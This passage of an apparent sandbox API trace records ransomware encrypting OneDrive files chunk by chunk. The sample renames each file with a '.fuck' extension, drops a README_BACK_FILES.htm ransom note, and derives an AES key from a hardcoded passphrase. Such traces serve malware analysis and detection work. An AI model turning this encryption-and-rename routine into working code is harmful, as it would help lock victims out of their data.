pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.774] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.774] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.774] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.775] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.775] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.775] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.775] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.775] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.775] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.776] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.776] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.776] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.776] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.776] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.777] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.777] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.777] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.777] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.777] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.777] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.778] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.778] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.778] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.778] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.778] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.778] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.779] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.779] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x48, lpOverlapped=0x0) returned 1 [0279.779] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x48, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x50) returned 1 [0279.779] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0279.779] CloseHandle (hObject=0x5d3c) returned 1 [0279.779] CloseHandle (hObject=0x5d48) returned 1 [0279.779] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.840] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.840] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0279.842] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0279.844] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0279.844] CryptDestroyKey (hKey=0x2fb688) returned 1 [0279.844] CryptReleaseContext (hProv=0x2f2e0a0, dwFlags=0x0) returned 1 [0279.844] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0279.844] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0279.845] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\readme_back_files.htm")) returned 0xffffffff [0279.846] AreFileApisANSI () returned 1 [0279.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0279.846] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0279.847] GetFileType (hFile=0x5d4c) returned 0x1 [0279.848] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0279.849] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0279.849] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0279.850] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.850] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.850] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0279.850] GetLastError () returned 0x0 [0279.851] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui")) returned 0x20 [0279.851] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0279.852] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0279.853] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0279.898] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0279.899] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2ddf8) returned 1 [0279.901] CryptCreateHash (in: hProv=0x2f2ddf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0279.901] lstrlenA (lpString="TXNdkJRdVYjLbGOsIhrFFzdHzMlQm") returned 29 [0279.901] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0279.901] CryptDeriveKey (in: hProv=0x2f2ddf8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0279.902] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 